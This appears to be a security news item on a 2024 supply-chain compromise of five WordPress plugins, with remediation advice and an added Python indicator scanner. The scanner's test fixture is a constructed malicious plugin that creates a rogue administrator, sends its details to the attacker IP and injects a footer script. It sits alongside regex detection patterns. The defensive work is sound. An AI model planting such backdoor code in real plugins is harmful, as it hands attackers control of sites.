A recent supply-chain attack compromised several legitimate WordPress plugins by inserting malicious code that creates unauthorized administrator accounts, giving the attackers the ability to perform arbitrary actions on affected sites.
According to a report by Wordfence security researcher Chloe Chamberland, the malware attempts to create new administrator accounts and send their details to an attacker-controlled server. It also injects malicious JavaScript into the site footer to serve SEO spam.
The rogue administrator accounts were named "Options" and "Pluginauth", and their details were sent to the IP address 94.156.79[.]8.
How the attackers gained the access needed to modify the plugins is still unknown; the first signs of the malicious code were observed on June 21, 2024.
The affected plugins and versions are listed below; they have been removed from the WordPress.org plugin repository pending further investigation:
- Social Warfare 4.4.6.4 – 4.4.7.1 (patched version: 4.4.7.3) – over 30,000 installations;
- Blaze Widget 2.2.5 – 2.5.2 (patched version: 2.5.4) – over 10 installations;
- Wrapper Link Elementor 1.0.2 – 1.0.3 (patched version: 1.0.5) – over 1,000 installations;
- Contact Form 7 Multi-step Addon 1.0.4 – 1.0.5 (patched version: 1.0.7) – over 700 installations;
- Simply Show Hooks 1.2.1 (no patched version available) – over 4,000 installations.
Users of these plugins should update to a patched version where one exists (or remove the plugin), check their sites for unknown administrator accounts and delete them, and remove any malicious code that was injected, particularly in plugin files and the site footer.
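The following scanner is an added example written for this page, not Wordfence's tooling and not the actual malware. It walks a plugin directory and flags files that carry the indicators named in the report: the C2 IP address, the two rogue account names, creation of a user with the administrator role, and a `<script>` tag emitted from a `wp_footer` callback. The sample plugin files it scans are constructed inline to mimic the described behaviour; the regexes are heuristics and the 300/500-character windows are assumptions, so treat a hit as something to review by hand rather than proof of compromise.

```python
"""Heuristic scan of a wp-content/plugins tree for the indicators in the report above.

Added example, not Wordfence's code. The only facts taken from the report are
the C2 IP, the two account names and the described behaviours; every pattern
below is a heuristic of the author's own.
"""
import os
import re
import tempfile
from pathlib import Path

C2_IP = "94.156.79.8"                      # from the report (defanged there as 94.156.79[.]8)
ACCOUNT_NAMES = ("Options", "Pluginauth", "PluginAuth")  # report names; case variants assumed

INDICATORS = {
    # literal C2 address anywhere in the file
    "c2_ip": re.compile(re.escape(C2_IP)),
    # one of the rogue usernames as a PHP/JS string literal (case-sensitive on purpose:
    # lower-case 'options' is far too common in legitimate WordPress code)
    "admin_username": re.compile(r"""['"](?:%s)['"]""" % "|".join(ACCOUNT_NAMES)),
    # a user-creation call followed within ~300 chars by the administrator role
    "admin_user_creation": re.compile(
        r"wp_(?:insert|create)_user\s*\([\s\S]{0,300}?administrator", re.I),
    # a wp_footer hook whose callback emits a <script> tag within ~500 chars
    "footer_script_injection": re.compile(
        r"""add_action\s*\(\s*['"]wp_footer['"][\s\S]{0,500}?<script""", re.I),
}

SCAN_SUFFIXES = {".php", ".js"}


def scan_file(path: Path) -> list[str]:
    """Return the sorted indicator names found in one file (empty list if clean)."""
    text = path.read_text(encoding="utf-8", errors="ignore")
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def scan_plugin_dir(root: str) -> dict[str, list[str]]:
    """Map each flagged file (relative POSIX path) to its indicators."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath) / name
            if p.suffix.lower() not in SCAN_SUFFIXES:
                continue
            found = scan_file(p)
            if found:
                hits[p.relative_to(root).as_posix()] = found
    return dict(sorted(hits.items()))


# Constructed sample plugin files: one mimicking the behaviour described in the
# report (admin account creation, exfiltration to the C2, footer script), one
# benign footer hook, one benign user-creation call. None is real plugin code.
EVIL_PLUGIN = """<?php
/* Plugin Name: Evil Widget (constructed sample, not the real malware) */
add_action('init', function () {
    $uid = wp_insert_user(['user_login' => 'Options', 'user_pass' => 'x',
                           'role' => 'administrator']);
    wp_remote_post('http://94.156.79.8/', ['body' => ['u' => 'Options', 'id' => $uid]]);
});
add_action('wp_footer', function () {
    echo '<script src="http://94.156.79.8/s.js"></script>';
});
"""
BENIGN_FOOTER = """<?php
/* Plugin Name: Benign Footer (constructed sample) */
add_action('wp_footer', function () { echo '<p>Thanks for visiting.</p>'; });
"""
BENIGN_SIGNUP = """<?php
/* Plugin Name: Benign Signup (constructed sample) */
function bs_register($login, $pass) {
    return wp_insert_user(['user_login' => $login, 'user_pass' => $pass, 'role' => 'subscriber']);
}
"""


def build_sample_plugins() -> str:
    """Write the constructed samples into a temp dir laid out like wp-content/plugins."""
    root = tempfile.mkdtemp(prefix="plugins-")
    for slug, body in (("evil-widget", EVIL_PLUGIN),
                       ("benign-footer", BENIGN_FOOTER),
                       ("benign-signup", BENIGN_SIGNUP)):
        d = Path(root) / slug
        d.mkdir()
        (d / f"{slug}.php").write_text(body, encoding="utf-8")
    return root


if __name__ == "__main__":
    for rel, found in scan_plugin_dir(build_sample_plugins()).items():
        print(f"{rel}: {', '.join(found)}")
```

Point `scan_plugin_dir` at a real `wp-content/plugins` directory to scan a live site. Finding injected code is only half of the cleanup: the rogue accounts live in the database, so also list administrators with WP-CLI (`wp user list --role=administrator --fields=ID,user_login,user_email,user_registered`), delete any you do not recognise (`wp user delete <ID> --reassign=<trusted-admin-ID>`), and rotate the credentials of the remaining administrators, since the malware sent account details off-site.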